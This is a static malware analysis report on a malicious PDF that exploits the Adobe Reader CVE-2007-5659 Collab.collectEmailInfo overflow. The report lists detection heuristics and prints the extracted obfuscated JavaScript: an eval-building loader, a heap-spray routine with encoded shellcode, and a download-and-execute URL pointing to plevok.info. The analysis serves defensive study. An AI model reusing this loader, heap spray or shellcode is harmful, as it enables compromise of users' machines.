Malicious PDF — malware analysis report

Static analysis result for SHA-256 0949bacc65883de8…

MALICIOUS

PDF

17.5 KB
MD5: 5d3aaab8898f933a0328a19363075d4a SHA-1: 2c92534d6afce6eba8aee1ed88ffe4284f37b1f1 SHA-256: 0949bacc65883de80142170e48a8813ab61014ba53953e96c3897de280341413
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The script is designed to download a second-stage payload from the embedded URL http://plevok.info/page/gold.php/n002106201r0010R43329fdcX7da8faa3Y673bad53Z0100f080. The presence of anti-analysis checks and the use of String.fromCharCode for decoding further indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://plevok.info/page/gold.php/n002106201r0010R43329fdcX7da8faa3Y673bad53Z0100f080 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x43B8 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
a7d33fa3c36db1937bb5cac9e1da1780994f19b670179b97a6a72988d3b804da		 deobfuscated-js z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1AEC 5358 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var qbg_l3YCk1i14J = new Array();var qQFm1p7h_02Mtl = 0;var ON_Thu1_gn_41 = "";function Xi6_8qlRAR1(s27_8_BmUewf, VNPGExsx2i){var wci__fE_uFM3t = VNPGExsx2i.toString();var q_YEJDJSA1W_xI3 = "";for(var v2a_X86_mk = 0; v2a_X86_mk < wci__fE_uFM3t.length; v2a_X86_mk++) {var qV_4cq = parseInt(wci__fE_uFM3t.substr(v2a_X86_mk, 1));if (!isNaN(qV_4cq)) {qV_4cq = qV_4cq.toString(16);if (qV_4cq.length == 1) { qV_4cq = "0" + qV_4cq; }else if (qV_4cq.length != 2) { qV_4cq = "00"; }q_YEJDJSA1W_xI3 = qV_4cq + q_YEJDJSA1W_xI3;if (q_YEJDJSA1W_xI3.length == 8) {break;}}}while(q_YEJDJSA1W_xI3.length < 8) { q_YEJDJSA1W_xI3 = "0" + q_YEJDJSA1W_xI3; }var p2b_L6_Xt = s27_8_BmUewf.toString(16);if (p2b_L6_Xt.length == 1) { p2b_L6_Xt = "0" + p2b_L6_Xt; }else if (p2b_L6_Xt.length != 2) { p2b_L6_Xt = "00"; }q_YEJDJSA1W_xI3 = "3" + p2b_L6_Xt + "P" + q_YEJDJSA1W_xI3;return q_YEJDJSA1W_xI3;}function X_27_Ao(Drs54p, Krp_4Cw__K){var tW8L__R_Fm = new Array("");var nL_3h__4f3yXx_F = Drs54p;var OT8_G4p_Xl__U;if ((OT8_G4p_Xl__U = Drs54p.lastIndexOf("%u00")) != -1) {if (OT8_G4p_Xl__U + 6 == Drs54p.length) {tW8L__R_Fm[0] = Drs54p.substr(OT8_G4p_Xl__U + 4, 2);nL_3h__4f3yXx_F = Drs54p.substring(0, OT8_G4p_Xl__U);}}OT8_G4p_Xl__U = 1;for (v2a_X86_mk = 0; v2a_X86_mk < Krp_4Cw__K.length; v2a_X86_mk++) {var Fvadog7DS4_fE = Krp_4Cw__K.charCodeAt(v2a_X86_mk).toString(16);if (Fvadog7DS4_fE.length == 1) { Fvadog7DS4_fE = "0" + Fvadog7DS4_fE; }tW8L__R_Fm[OT8_G4p_Xl__U] = Fvadog7DS4_fE;OT8_G4p_Xl__U++;}v2a_X86_mk = tW8L__R_Fm[0].length ? 0 : 1;tW8L__R_Fm[OT8_G4p_Xl__U] = "00";tW8L__R_Fm[OT8_G4p_Xl__U + 1] = "00";OT8_G4p_Xl__U += 2;if ((tW8L__R_Fm.length - v2a_X86_mk) % 2) {tW8L__R_Fm[OT8_G4p_Xl__U] = "00";}while(v2a_X86_mk < tW8L__R_Fm.length) {nL_3h__4f3yXx_F += "%u" + tW8L__R_Fm[v2a_X86_mk + 1] + tW8L__R_Fm[v2a_X86_mk];v2a_X86_mk += 2;}nL_3h__4f3yXx_F += "%u0000";return nL_3h__4f3yXx_F;}function gO7_AF44b_uWP_t(uq4NLvMW7_t73_l, h_8oLAR3Gr){while (uq4NLvMW7_t73_l.length*2<h_8oLAR3Gr) {uq4NLvMW7_t73_l += uq4NLvMW7_t73_l;}uq4NLvMW7_t73_l = uq4NLvMW7_t73_l.substring(0,h_8oLAR3Gr/2);return uq4NLvMW7_t73_l;}function d_Uu___0(d1VOj_Ia80q, ioDn_06, kiSi2l_e8vcs){var M6h4qm__6fB_dv = 0x0c0c0c0c;var uq4NLvMW7_t73_l = unescape(ioDn_06);var Krp_4Cw__K = Xi6_8qlRAR1(d1VOj_Ia80q, kiSi2l_e8vcs);var xt__W_CglN4E74U = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var Drs54p = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6670%u4e4d%u6670%u4574%u0043%u7468%u7074%u2f3a%u702f%u656c%u6f76%u2e6b%u6e69%u6f66%u702f%u6761%u2f65%u6f67%u646c%u702e%u7068%u6e2f%u3030%u3132%u3630%u3032%u7231%u3030%u3031%u3452%u3333%u3932%u6466%u5863%u6437%u3861%u6166%u3361%u3659%u3337%u6162%u3564%u5a33%u3130%u3030%u3066%u3038";app.Nj6_UK57C = unescape(X_27_Ao(Drs54p, Krp_4Cw__K));var kgSO_Px_6_fo = 0x400000;var k2XTMN8u = xt__W_CglN4E74U.length * 2;var h_8oLAR3Gr = kgSO_Px_6_fo - (k2XTMN8u+0x38);uq4NLvMW7_t73_l = gO7_AF44b_uWP_t(uq4NLvMW7_t73_l, h_8oLAR3Gr);var w_rJl____c = (M6h4qm__6fB_dv - 0x400000)/kgSO_Px_6_fo;for (var dJy__MEfv = 0; dJy__MEfv < w_rJl____c; dJy__MEfv++) {qbg_l3YCk1i14J[dJy__MEfv] = uq4NLvMW7_t73_l + 
... (truncated)
deobfuscated.js
1b0d1df312450ad0467563d4f25527acf64ce15b0e747ea1b6e6c4f89ce1c49e		 deobfuscated-js PDF JavaScript deobfuscation pass 179303 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
1f4j77884h0a1a589j7g325i233g09630g0ib54jc07b2b9ibf5e6c641g4d08526h4i14b30a92af11142f4g6j2a0f9j9d3ca85b889k392e858i9kbja64d9fad7hai903eb21e7b9i0c438e2b26686c5208814a8j537g18acb97hba5h14ai1c84516h13148g7ka86h27489i517i8f34a58e39b1952eb55e419jb2550a5g234fbf4f680g56a9bc54872c274j094ca7ah408ga93719ac1f56b6825eb1bj1cae8a877g268i1g8gah44a70j2i8f2026109a1k7k2k2aag3c167c6925049k1277819j7f2g1kb512027919450404ak77764dbf44688j2b5e9d763h62702c229d587g3144bh29497g754ib76929724j70316j0f72ac6d14c091626f8e452ea634a69b264d8740626k50817816036h2cbc6836a86i700a3g0c47b43f23b92ib2bf856jbi246e8e909ebi0j07c27403ajb767a3a00e960h201aac6g44066c12a388398i3823b6930g817ebc9c2f2c6e26be0361c294ak06127bb86a6d45a9856i961k3918bd8b854k2fb354686h0c50384i66708j6640ab4a611b3c1fa70b5cb7351d49064b3d6j5e42c045117c689f6i1g5c4e3g9c5743b190622h4g299c5d5a2e28bd0a62545b4d0ea57b89010b9f67a79930109301ai682601b3698ka38d7bbd1800ajbd8g7950a782b7456i3k99073f56759e1c95580g5h1jb39j83b99cbi1e0jbabj664e1c0714b0701b1c05358539812e2j718b6fb1120a0d6h507a312g1d4f3614434d6e2f218b5a5b57bh494j544ba4bd20b44b431ab83d58474c57a32c1a7j7j4c6fbi4k5b5a79830i3b838f1e3c1caj9ga74845044964ad6h1k9ka0809792ba89569gc2ba967f0kab003cai9j449191445g5j3484168j6b727fa800b43i5c30c32g181e448d9db931bb3d29a23c83094hag0226a99k36611i510d7g34a63g5b4d95178g0e53785j1h2d2k6c753e04a91d450j1j2d2g4j654138288e5f81611f28635j856i94b39k3k8j0a6i9j8040933079a01i66ac3b79be997ab39326941g4c8b900gbc758i9328258g2k8bbb629j7a8g62a451886139a6aiak9i71b79k112a6d4898af2c56723h32b5bf4c62429db824823g57539b46102k5ac00c150db61b3ba51h7g884ga81558887j386i2c2kab57c2bhc03d123h3e9c2b6h494608282965673812b92963880d9f201i5jb5a99308269b4jaa9d694cak4g7880a84e7d7d5i798h5iah015h8c1d5ga51k4j96ae5ga3564e9053871bacb990b07ac3bfbd6c526hbg30b884ba6d0d7ea47a7j983j9c926cb1973a9h4j5676aj1917645e188c59310g34b3bj54660j4f4jbc4h8d2142bi0g372ib00c5b076j429i0e1ga05i4c911c92aa6db77f0h3ib75fa82fadac27a20k4aai430da46h2593b712bc971jad4a0e969ba2ak1623994083ac765b91567h711i3kac9f6h80975c10b63c853f31b3c0306e886b1035316d4c7d2f830531a34a20bj033a488g1b269k5i2278534g8d5b7495284a414h08732e7e2f046b8533af1c0113be7442b9bda5a6596dbgbd6ab67ba2b80jc18g5k977j9b5cad601f950fc1aea83b79be9918b3932f7h4f2aa79f2ia5a517b6112j9a2e278i3a9j7h0a3ia95j006478490kbgai8iae320ibh87655j531k40796h2d47bf4f264471260k7a2168355g1c1325528k6c234h085f5e5b1h4h882e15833875ae11838f620j973f278i6j044cc05f7i6c3h560b179j7e844812a5925e9e3e1k439b6k21bga208ab915bb8bc5k80874g7e961901b97d5fbb5hc1b20k4k7j2d0j01133e6675b495821d8h430iak7j258hbcaibf9fbk8a6a23bj210770071e006ia3737c423778576kbj3e3abd4k378f4f4d032h23085i5f5c4e139162568c303k304454930f37ab2k4fb1a93775694i38b01i125k537g8g188i618hae72ba3d559fb35803936a753k49031c6aag7c1e00bj9gb1a1a6893f74940hbf719j910836a2a57c8hag5a668j249ka69b7291920a198g3e63089kb4bd5244911b255b307030bh23620f68abac1e808a353bb118ai8e60142c544j6931780g507f5c21bh4f6c9i39269a3g5b0j2c363k3a641j250j8k5b7666171a5e4f7g6a9ga2b76g8b08ad0f564i890k87020d4j8h574kb87c51ak8f4kb9387ca592168bbe9393272597316cbi5g1662a360157c9b7d699a04ah8e8d0j7f16b78k7e8eah2k4g3h56bh8ebf5926417g042f842i5e43b53ebf2j4ja5bh283cbg2a6a0d4a71b83kc110287e6i0a4kbb31a9972900136b2h64257b346j4j4gc0381i5d973g0gai3a85ajb9a51j1g8fb5b6938i2473209eah5j319k6d7hbh1251b3ad879k4k389aaa4e83326e8e1b2ea6924kb7703g824362167b2i89bf83240k9j542e97bh3ab86eae6g276ja93i4469c26k5g2i34ae32a25j568f9b41195k4b2da22g5a2d22b1b24i8k253c49ba2g9c9j029b9h39030d3c6i0h7b50752kb30j7a756abb7k1k8d79539j3d186g0456038i25804d19044939a37h2e8d804bb18g0f8b623eajaabf7k1c3h0a348e6a4f3091335c9kb322a35j7h7k6i4e10bg4e7g246f183b1d76a564063725765a400553af5k8g5006c0b03d5b7k3i119i3f1g855b2889477d7131787a472b7e6e8258349380440j4934137i520g020705bb686dah1j5eb65h9h9623000g89b36ia15c956205989fbhaa772k52029020b49d607h420caf9a44a5a5c2bd033a976229ae3823990d3d098kbi96730814a17k7kbi2ebbbd8a78903k15477h443e5e0a6848778d4j14a14g3g215g46aab95bb048502eba3j3c5c5f3i0b520g7e609c6i0g858b3jb7793j107g4d2h7h076d8d7f375j1k429a8e8k15b38ca0859b30bh3a996f0j1d9c8gbia95g97ag5bc292787kb0229c89ad8k795aa782277e7h1hbb0c364j789a1fa74j3g97292d1eaf0477a22g0703b07c6e05bi38c040ajbh38727h5d6644218f695i2i1e18bk792k9e52443c665d3i5550
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.